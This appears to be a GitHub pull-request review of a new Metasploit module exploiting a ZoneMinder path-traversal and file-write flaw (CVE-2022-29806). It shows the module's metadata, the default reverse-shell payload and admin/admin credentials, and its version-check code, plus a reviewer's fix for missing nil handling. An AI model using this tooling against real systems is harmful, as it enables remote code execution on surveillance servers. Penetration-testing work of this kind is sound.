modules/exploits/unix/webapp/zoneminder_lang_exec.rb

```diff
@@ -0,0 +1,227 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ZoneMinder Language Settings Remote Code Execution',
+        'Description' => %q{
+          This module exploits arbitrary file write in debug log file option
+          chained with a path traversal in language settings that leads to a
+          remote code execution in ZoneMinder surveillance software versions
+          before 1.36.13 and before 1.37.11
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'krastanoel' ], # Discovery and exploit
+        'References' => [
+          [ 'CVE', '2022-29806' ],
+          [ 'URL', 'https://krastanoel.com/cve/2022-29806']
+        ],
+        'Platform' => ['php'],
+        'Privileged' => false,
+        'Arch' => ARCH_PHP,
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2022-04-27',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'Payload' => 'php/reverse_perl',
+          'Encoder' => 'php/base64'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('USERNAME', [true, 'The ZoneMinder username', 'admin']),
+      OptString.new('PASSWORD', [true, 'The ZoneMinder password', 'admin']),
+      OptString.new('TARGETURI', [true, 'The ZoneMinder path', '/zm/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/index.php'),
+      'method' => 'GET'
+    )
+    return Exploit::CheckCode::Unknown('No response from the web service') if res.nil?
+    return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200
+
+    if res.body =~ /ZoneMinder Login/
+      csrf_magic = get_csrf_magic(res)
+      res = authenticate(csrf_magic)
+      return Exploit::CheckCode::Safe('Authentication failed') if res.body =~ %r{<title>ZM - Login</title>}
+
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, '/index.php'),
+        'method' => 'GET',
+        'keep_cookies' => true
+      )
+    end
+
+    res.body.match(/v(1.\d+.\d+)/)
+    version = Rex::Version.new(Regexp.last_match(1))
+
+    return Exploit::CheckCode::Appears("Version Detected: #{version}") if version <= Rex::Version.new('1.37.10')
+
+    Exploit::CheckCode::Safe("Version Detected: #{version}")
```

Comment:
There's a gap in the conditional logic here.

If `res.code == 200` then the branch isn't taken, then `version` is set to the `res.body.match(/v(1.\d+.\d+)/)` match. From there, the only return states both include "Version Detected". This doesn't account for a `nil` version (ie, no version match), unless the intention is for `version` to `raise` during `Rex::Version.new` to be caught by the `rescue`, which is rather sloppy. This should be handled explicitly.

Here's some psuedo code which partially resolves the issue, but doesn't account for instances where any version string for any software less than version `1.37.10` will result in a false positive match. Ideally, this method should look for a `ZoneMinder` / `ZM` string or some other identifying string in both branches (ie, currently the first branch checks for `ZoneMinder Login`, but the second branch does not).


```suggestion
    return Exploit::CheckCode::Safe("Check TARGETURI - unexpected HTTP response code: #{res.code}") if res.code != 200

    if res.body =~ /ZoneMinder Login/
      csrf_magic = get_csrf_magic(res)
      res = authenticate(csrf_magic)
      return Exploit::CheckCode::Safe('Authentication failed') if res.body =~ %r{<title>ZM - Login</title>}

      res = send_request_cgi(
        'uri' => normalize_uri(target_uri.path, '/index.php'),
        'method' => 'GET',
        'keep_cookies' => true
      )
    end

    version = res.body.scan(/v(1.\d+.\d+)/).flatten.first
    unless version
      return CheckCode::Safe("Target is not a ZoneMinder web server")
    end

    return Exploit::CheckCode::Appears("Version Detected: #{version}") if version <= Rex::Version.new('1.37.10')

    Exploit::CheckCode::Safe("Version Detected: #{version}")
```

Reply:
Thanks bcoles, I completely overlooked that.

I've check if the target is a Zoneminder before parsing the version and also make sure the version is not nil.